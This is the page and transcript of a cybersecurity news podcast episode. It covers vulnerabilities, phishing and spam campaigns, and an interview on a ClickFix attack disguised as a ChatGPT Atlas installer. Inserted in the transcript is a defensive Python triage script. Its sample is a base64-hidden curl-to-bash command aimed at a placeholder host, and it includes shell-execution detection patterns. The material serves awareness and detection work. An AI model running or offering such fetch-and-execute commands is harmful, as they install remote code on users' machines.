CyberWire Daily - Stabilized but smaller.
Episode Date: January 22, 2026

CISA’s acting director assures Congress the agency has “stabilized”. Google and Cisco patch critical vulnerabilities. Fortinet firewalls are being hit by automated attacks that create rogue accounts. A global spam campaign leverages unsecured Zendesk support systems. LastPass warns of attempted account takeovers. Greek authorities make arrests in a sophisticated fake cell tower scam. Executives at Davos express concerns over AI. Pwn2Own Automotive proves profitable. Our guest is Kaushik Devireddy, AI data scientist at Fable Security, with insights on a fake ChatGPT installer. New password, same as the old password.

Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you’ll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn.

CyberWire Guest
Today we are joined by Kaushik Devireddy, AI data scientist at Fable Security, discussing their work on "How a fake ChatGPT installer tried to steal my password".

Selected Reading
CISA Is 'Trying to Get Back on Its Mission' After Trump Cuts (CISA)
Google Patches High-Severity V8 Race Condition in Chrome 144 (Beyond Machines)
Cisco Patches Actively Exploited Flaw in Unified Communications Products (Beyond Machines)
Hackers breach Fortinet FortiGate devices, steal firewall configs (Bleeping Computer)
Zendesk ticket systems hijacked in massive global spam wave (Bleeping Computer)
LastPass Warns of Phishing Campaign Attempting to Steal Master Passwords (Infosecurity Magazine)
Greek Police Arrest Scammers in Athens Using Fake Cell Tower for SMS Phishing Operation (TechNadu)
Execs at Davos say AI's biggest problem isn't hype — it's security (Business Insider)
Hackers exploit 29 zero-days on second day of Pwn2Own Automotive (Bleeping Computer)
Analysis of 6 Billion Passwords Shows Stagnant User Behavior (SecurityWeek)

Share your feedback.
What do you think about CyberWire Daily? Please take a few minutes to share your thoughts with us by completing our brief listener survey. Thank you for helping us continue to improve our show. Want to hear your company in the show? N2K CyberWire helps you reach the industry’s most influential leaders and operators, while building visibility, authority, and connectivity across the cybersecurity community. Learn more at sponsor.thecyberwire.com. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
You're listening to the CyberWire Network, powered by N2K.
Most security conferences talk about Zero Trust.
Zero Trust World puts you inside.
This is a hands-on cybersecurity event designed for practitioners who want real skills, not just theory.
You'll take part in live hacking labs where you'll attack real environments, see how modern threats actually work, and learn how to stop them before they turn into incidents.
But Zero Trust World is more than labs.
You'll also experience expert-led sessions, practical case studies, and technical deep dives focused on real-world implementation.
Whether you're blue team, red team, or responsible for securing an entire organization, the content is built to be immediately useful.
You'll earn CPE credits, connect with peers across the industry, and leave with strategies you can put into action right away.
Join us March 4th through the 6th in Orlando, Florida.
Register now at ZTW.com and take your zero-trust strategy from theory to execution.
CISA's acting director assures Congress the agency has stabilized.
Google and Cisco patch critical vulnerabilities.
Fortinet firewalls are being hit by automated attacks.
A global spam campaign leverages unsecured Zendesk support systems.
LastPass warns of attempted account takeovers.
Greek authorities make arrests in a sophisticated fake cell tower scam.
Executives at Davos express concerns over AI.
Pwn2Own Automotive proves profitable.
Our guest is Kaushik Devireddy, AI data scientist at Fable Security,
with insights on a fake ChatGPT installer.
And new password, same as the old password.
It's Thursday, January 22nd, 2026.
I'm Dave Bittner, and this is your CyberWire Intel briefing.
Thanks for joining us here today.
It's great to have you with us.
The U.S. Cybersecurity and Infrastructure Security Agency
is working to refocus on its core mission
after a turbulent year marked by staffing losses,
funding disruptions, and internal restructuring.
Acting director Madhu Gottumukkala
told the House Homeland Security Committee
that the agency has stabilized
and does not expect further
organizational changes in fiscal year 2026. CISA now employs more than 2,400 staff,
roughly 1,000 fewer than at the start of the Trump administration.
Gottumukkala said the reductions were part of a broader White House effort to shrink the federal
workforce and right-size the agency. He argued CISA now has the workforce it needs
and plans targeted initiatives in 2026 to address the most critical cyber risk gaps.
Republicans praised a narrower operational focus,
while Democrats warned proposed budget cuts could weaken civilian cyber defenses
as foreign threats persist.
Funding debates for the Department of Homeland Security, including CISA,
are expected to intensify ahead of a looming shutdown deadline.
Google has released an urgent update for Chrome and other Chromium-based browsers to fix a high-severity flaw in the V8
JavaScript engine. The vulnerability is a race condition that allows memory corruption and could
enable attackers to escape the browser sandbox and run code on a user's system by luring
them to a malicious site. The update, released January 20th, applies to Windows, macOS,
and Linux. Users should update Chrome and Chromium-based browsers
immediately, according to Google.
Elsewhere, Cisco has issued emergency patches for a critical vulnerability affecting its enterprise
communications platforms, warning of active exploitation attempts.
The flaw is an unauthenticated code injection issue in web-based management interfaces that can
allow attackers to execute commands and potentially gain full system control.
Impacted products include Unified Communications Manager,
Unity Connection, and Webex Calling Dedicated Instance.
Cisco says there are no workarounds and urges immediate patching.
Researchers warn that Fortinet FortiGate firewalls are being hit by automated
attacks that create rogue accounts and rapidly export firewall configurations.
According to Arctic Wolf, the campaign began January 15th and appears to exploit an unknown
weakness in FortiGate's single sign-on feature, closely resembling attacks seen in December
of last year.
Arctic Wolf says it remains unclear whether current attacks are fully addressed by existing
patches, and customer reports suggest a possible patch bypass.
Fortinet is expected to release additional FortiOS updates to resolve the issue.
Until then, defenders are advised to disable FortiCloud SSO.
CISA has already flagged the earlier vulnerability as actively exploited, while Shadowserver reports nearly 11,000 exposed
devices online.
A global spam campaign has flooded inboxes with hundreds of confusing emails generated through
unsecured Zendesk support systems. The wave began January 18th and abuses Zendesk's default
settings that allow unverified users to submit support tickets, which then trigger automated
confirmation emails to whatever address is entered.
Attackers iterated through large email lists,
effectively turning legitimate customer support platforms into mass spam engines.
The emails feature bizarre or alarming subject lines,
including fake legal notices and promotional offers,
often written with decorative unicode text.
While the messages do not contain malicious links,
they bypass spam filters because they originate
from trusted companies, making them particularly disruptive.
Affected organizations include Discord, Dropbox, Riot Games, and government agencies.
Zendesk says it's rolled out new safeguards to detect and limit this relay spam
and advises customers to restrict ticket submissions to verified users.
LastPass is warning users about an active phishing campaign designed to steal master passwords
and take over accounts.
According to the company's threat intelligence, mitigation, and escalation team,
the campaign began January 19th and is circulating widely.
The phishing emails impersonate LastPass and claim users must urgently back up their
password vaults within 24 hours ahead of supposed maintenance.
Links in the messages lead to a fake LastPass login page that captures credentials if entered.
Because LastPass stores passwords for other services,
a compromised master password could expose many additional accounts.
LastPass says it will never ask for a master password or demand immediate action
and is working with partners to take down the malicious domains.
The company urges users to remain cautious,
noting that false urgency is a common phishing tactic.
Greek authorities have arrested two foreign nationals
accused of running a sophisticated fake cell tower scam in the Athens area.
According to Hellenic police, officers discovered a mobile computing system hidden in a car trunk
that acted as a rogue cellular base station, often called an SMS blaster.
The setup linked to a concealed roof antenna, impersonated legitimate telecom infrastructure,
and intercepted nearby mobile connections.
Police say the suspects exploited known weaknesses
in mobile network protocols, forcing phones to downgrade from 4G to less secure 2G connections.
This allowed them to collect device identifiers and phone numbers, which were then used in
smishing campaigns posing as banks or courier services. Authorities have tied the operation
to several confirmed fraud cases in and around Athens with investigations ongoing.
Executives from EY and KPMG warned at the World Economic Forum in Davos that AI security is emerging as a major enterprise risk.
EY's Raj Sharma told Business Insider that organizations are not adequately addressing the security and lifecycle management of AI agents,
which can access sensitive data but lack clear identity and controls.
He argued that industrial-grade security frameworks for AI agents are still immature.
KPMG U.S. CEO Tim Walsh echoed those concerns, saying AI-related cyber risk is now a top issue for CEOs
and is slowing some AI deployments as firms reassess data protection.
Walsh also flagged quantum computing as a future security threat,
warning that it could break current encryption and force widespread re-engineering of security systems.
Day two of Pwn2Own Automotive 2026 proved that hacking cars and chargers can be very
profitable.
Security researchers walked away with over $439,000 in prize money after popping 29 fresh
zero-day bugs at the event in Tokyo held during the Automotive World show.
After two days, total winnings hit over $952,000 across 66 zero-days. Fuzzware.io led the pack with $213,000, thanks to successful hacks
against multiple EV chargers. Other teams rooted infotainment systems, car operating systems like
Automotive Grade Linux, and more charging hardware. Even Tesla tech made an appearance earlier in
the contest. The fun continues on day three with more chargers and systems lined up for attack.
Vendors now have 90 days to patch before details go public, so the clock
is ticking. Coming up after the break, my conversation with Kaushik Devireddy from Fable Security.
We're discussing insights on a fake ChatGPT installer. And new password, same as the old password.
Stick around. Ever wished you could rebuild your network from scratch to make it more secure,
scalable, and simple? Meet Meter, the company reimagining enterprise networking from the ground up.
Meter builds full-stack zero-trust networks, including hardware, firmware, and software,
all designed to work seamlessly together.
The result?
Fast, reliable, and secure connectivity without the constant patching, vendor-juggling, or hidden costs.
From wired and wireless to routing, switching, firewalls, DNS security, and VPN,
Every layer is integrated and continuously protected in one unified platform.
And since it's delivered as one predictable monthly service,
you skip the heavy capital costs and endless upgrade cycles.
Meter even buys back your old infrastructure to make switching effortless.
Transform complexity into simplicity and give your team time to focus on what really matters,
helping your business and customers thrive.
Learn more and book your demo at meter.com/cyberwire. That's M-E-T-E-R dot com slash cyberwire.
What's your 2 a.m. security worry? Is it, do I have the right controls in place?
Maybe are my vendors secure? Or the one that really keeps you up at night, how do I get out from
under these old tools and manual processes? That's where Vanta comes in. Vanta automates the
manual work, so you can stop sweating over spreadsheets, chasing audit evidence, and filling out
endless questionnaires. Their trust management platform continuously monitors your systems,
centralizes your data, and simplifies your security at scale. And it fits right into your
workflows, using AI to streamline evidence collection, flag risks, and keep your program
audit ready all the time. With Vanta, you get everything you need to move faster, scale
confidently, and finally get back to sleep. Get started at Vanta.com slash cyber.
That's V-A-N-T-A dot com slash cyber.
Kaushik Devireddy is AI data scientist at Fable Security.
We recently got together to discuss insights on a fake ChatGPT installer.
So it was right before the Thanksgiving holidays.
I think we work at a startup, but even around Thanksgiving,
things are slowing down a little bit.
I found myself with a little bit of free time to kind of do some research,
explore online.
And I was very interested in the concept of the AI browser, which many of you have probably heard of.
And I wanted to try it out, give it a spin, and actually test them on their susceptibility to prompt injection.
So these are browsers like ChatGPT Atlas, Perplexity Comet, Atlassian's Dia.
When I searched for the first one, ChatGPT Atlas, it had very recently been released.
I curiously noticed on Google, when you search that term, the first result
was actually a sponsored result.
And it looked, you know, the title and description looked identical to the second result,
which was an official Google search result from ChatGPT itself.
And so I immediately picked up that it was a fake site, given that it was served from a Google Sites domain,
and decided to go down that rabbit hole instead to see, you know, what kind of attack this would present me with.
When I clicked on that site, it was very interesting,
because the website looked exactly identical to the normal ChatGPT Atlas site.
I pulled them both side by side to compare.
And so the malicious group had stolen exactly the HTML, the styling, everything from the links themselves.
And there was really no way to tell that this was a malicious website other than the domain itself not being ChatGPT's.
And so I decided to take it one step further and look through the entire kill chain.
And so when I clicked the download button to get the AI browser downloaded, rather than
it downloading some software to my laptop, it presented me with a new screen. This is where it
differs from the official ChatGPT website, asking me to run a command on my laptop. Now, most of the
audience may recognize this is what's commonly known as a ClickFix attack. But the really interesting
piece here is typically
ClickFix attacks.
The name, it's called ClickFix
because it's typically
prompting you to fix something on your
computer. It may say, hey, Dave,
your software is out of date.
To continue accessing this website,
please run this command.
Or, hey, please prove to us that you're a human.
We think you're a bot.
Run this command. This was very different
because it was actually telling me,
hey, we're going to give you this AI browser.
You have this intent to download it.
Here's exactly how to download it by running a command
kind of on your computer.
And I thought this was very interesting
because while ClickFix attacks are well known,
the deception strategy and the entry point
was very different from a traditional ClickFix attack.
Now, are you on a Mac or a PC here?
I'm on a Mac.
Okay.
Yeah.
And the website actually said a download,
it gave me a download for Mac button.
Huh. So what happens next?
Totally. So if you run that command, which, if that website is still live,
please do not run that command on your computer.
But I actually pulled the script into a sandbox environment to see what it would actually do.
And at first glance, the command looks almost benign.
It's running a, it's pulling a script from the internet and executing it.
And it is encoded in base64.
So there's no way to see what the URL is that it's curling and pulling the script from.
If you decode the base64, you'll notice it's a very peculiar URL.
It's a free file hosting site.
And this is where the threat actor group was hosting some infostealer malware.
So had you installed this, it would have downloaded the infostealer malware.
Do you happen to know what flavor of info stealer it was trying to put on your system?
Totally. So the curious step before it was it would actually ask you for your system password. So it's clear that the infostealer malware wouldn't be able to execute without sudo permissions. And so if you didn't type in your password properly, it would keep prompting you over and over saying, hey, we can't install until you type your password. I ended up getting the infostealer malware and uploading it to VirusTotal to see what matches I could find. At the time, there were
no specific matches that it was able to determine.
But I think the really interesting piece was I have an EDR running on my laptop and in the
sandbox.
And the EDR did not pick up that it was a malicious file.
As a Mac user, and I'm a Mac user myself, it's fair to say, don't you think that for someone
to ask you to invoke the terminal and enter a command,
that rarely happens.
Correct, correct.
So that was a red flag for you.
Yes, yes.
I think you should never run an arbitrary shell command on your computer,
especially on a corporate device,
which has very sensitive information,
unless you're absolutely sure you know what it's doing.
So there's multiple things at play here.
I mean, what are the take-home lessons for you
in terms of advising,
folks to best protect themselves here.
Totally. I think, like, traditionally when we think about ClickFix attacks and the way these
attacks come in, typically, you know, the attack vector is it lands in your email inbox.
You know, there's a phishing email which will lead you to this URL and the URL, that website,
will try and instruct users, hey, run this command. I think now we're starting to see, hey,
there are other ways that people can land upon this ClickFix attack,
and we need to spread awareness that these other attack vectors exist.
And I think at a very basic level,
we should be educating people that they should not be running arbitrary commands on their computer.
What if I'm in charge of administrating the computers?
And let's stay on the Mac here for a while.
If I had denied someone access to the terminal or, you know,
the ability to run as root, would that have helped?
Yeah, I think there's a certain class of users, right,
that you can lock down the device a bit more,
especially if they're not developers.
Removing root access to the terminal is a very positive step.
Now, there's always going to be users who need that type of access,
like software developers who are developing locally.
And for them, a technical control may not be enough,
and that's why we need the awareness piece.
That's Kaushik Devireddy from Fable Security.
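The command the guest describes, a base64 blob that hides a curl-and-execute, is easy to triage without running it. The Python below is an added example, not Fable Security's code and not anything reproduced from the interview: it peels base64 layers off a pasted command, pulls out any URLs, and flags the fetch-and-pipe-to-shell pattern that ClickFix lures rely on. The sample command and its hostname are constructed placeholders, not the campaign's actual URL.

```python
import base64
import re

# Constructed sample (assumption): NOT the command the guest was shown, which
# the interview does not reproduce. It mimics the shape he describes: a
# base64 blob that, once decoded, curls a script from a hosting site and
# pipes it straight into a shell. The hostname is a placeholder.
_INNER = "curl -fsSL https://files.example.invalid/installer.sh | bash"
SAMPLE_COMMAND = (
    "echo " + base64.b64encode(_INNER.encode()).decode() + " | base64 -d | bash"
)

B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"|;]+")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
B64_DECODE_RE = re.compile(r"\bbase64\b[^|;]*(?:-d\b|--decode|-D\b)")
SUDO_RE = re.compile(r"\bsudo\b")


def decode_layers(command, max_depth=3):
    """Peel nested base64 layers off a command line.

    Returns the decoded layers, outermost first. A candidate blob is only
    accepted if it is valid base64 AND decodes to printable UTF-8 text,
    which filters out hashes and random tokens that merely look like base64.
    """
    layers = []
    current = command
    for _ in range(max_depth):
        decoded = None
        for m in B64_RE.finditer(current):
            try:
                text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue
            if text.replace("\n", "").replace("\t", "").isprintable():
                decoded = text
                break
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


def analyze(command):
    """Classify a pasted shell command the way a ClickFix triage script would."""
    layers = decode_layers(command)
    texts = [command] + layers
    indicators = set()
    for t in texts:
        if FETCH_RE.search(t):
            indicators.add("remote_fetch")
        if PIPE_TO_SHELL_RE.search(t):
            indicators.add("pipe_to_shell")
        if B64_DECODE_RE.search(t):
            indicators.add("base64_decode")
        if SUDO_RE.search(t):
            indicators.add("sudo")
    urls = sorted({u for t in texts for u in URL_RE.findall(t)})
    # Verdict: remote content piped into a shell, or an obfuscated payload
    # that ends in a shell, is exactly the pattern the interview describes.
    suspicious = "pipe_to_shell" in indicators and (
        "remote_fetch" in indicators or "base64_decode" in indicators
    )
    return {
        "layers": layers,
        "urls": urls,
        "indicators": sorted(indicators),
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    for cmd in (SAMPLE_COMMAND, "brew install --cask firefox"):
        print(cmd)
        print(analyze(cmd))
```

Run it on any command a web page asks you to paste: the decoded layer exposes the hidden URL and the verdict flags the fetch-and-execute pattern, with no need to touch the payload host. The printable-text check is what keeps random tokens and hashes from being mistaken for an encoded layer.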
When it comes to mobile application security, good enough is a risk.
A recent survey shows that 72% of organizations reported at least one mobile application security incident last year,
and 92% of responders reported threat levels have increased in the past two years.
GuardSquare delivers the highest level of security for your mobile apps without compromising
performance, time to market, or user experience.
Discover how GuardSquare provides industry-leading security for your Android and iOS apps at
www.guardsquare.com.
Security works best in layers, and when those layers actually work together, that's when
things get interesting.
NordLayer is a network security platform designed for modern teams.
It secures connections, controls access, and helps stop threats all without
hardware or long deployment cycles. Now, NordLayer has partnered with CrowdStrike to bring Falcon
endpoint protection into the mix, giving small and mid-sized businesses a multi-layered security approach
that's practical to deploy and easy to manage. NordLayer handles secure access and zero-trust networking.
CrowdStrike Falcon adds endpoint visibility and protection. Together, they cover more ground than
either could alone without requiring a large IT staff.
For business leaders, that means clearer control and easier compliance. For IT teams, it means granular
access policies, faster onboarding and protection that scales. If you're looking for enterprise-grade
security without enterprise-grade complexity, take a look at NordLayer. Get up to 22% off yearly
plans, plus an additional 10% with code Cyberwire-10. There's even a 14-day money-back guarantee.
Check out NordLayer.com slash CyberWire Daily to learn more.
And finally, after another year of security training,
stern warnings and posters begging users to think before you type,
passwords have once again refused to evolve.
An analysis of 6 billion leaked credentials by Specops Software,
using data from its parent firm Outpost24, shows that 2025's
most common passwords were the same familiar classics:
123456,
password and admin,
apparently still doing brisk business.
The report suggests this is not nostalgia, but habit.
Numeric strings dominate personal accounts,
while admin and password linger on enterprise gear
from networking devices to industrial systems.
That creates a predictable path for attackers
who can reuse stolen credentials to access VPNs, Active Directory, or cloud services. Even more complex passwords often
just decorate old favorites with a few extra characters. The lesson is dry but clear. Attackers innovate,
users reuse, and security teams clean up the mess. And that's the CyberWire. For links to all of
today's stories, check out our daily briefing at thecyberwire.com. We'd love to know what you think of
this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the
rapidly changing world of cybersecurity. If you like our show, please share a rating and review
in your favorite podcast app. Please also fill out the survey in the show notes or send an email
to cyberwire@n2k.com. N2K's senior producer is Alice Carruth. Our CyberWire producer is Liz
Stokes. We're mixed by Tré Hester with original music by Elliott Peltzman. Our executive producer
is Jennifer Eiben. Peter Kilpe is our publisher, and I'm Dave Bittner. Thanks for listening. We'll see you back here tomorrow.
If you only attend one cybersecurity conference this year, make it RSAC 2026. It's happening March 23rd through the 26th in San Francisco,
bringing together the global security community for four days of expert insights, hands-on learning, and real innovation.
I'll say this plainly, I never miss this conference. The ideas and
conversations stay with me all year. Join thousands of practitioners and leaders tackling today's
toughest challenges and shaping what comes next. Register today at rsaconference.com slash
CyberWire 26. I'll see you in San Francisco.
Attackers don't go through your tools. They go around them. In our interview with Jared
Atkinson, CTO at SpecterOps, he reveals how attackers look to exploit our identities, steal
tokens and quietly snowball their access across Active Directory, cloud apps, and GitHub.
We talk through attack paths, why least privilege keeps failing, and how one misconfiguration
can hand over the keys to your organization.
Want to see risk as attackers do?
Then check out the full interview now on thecyberwire.com slash specterops.
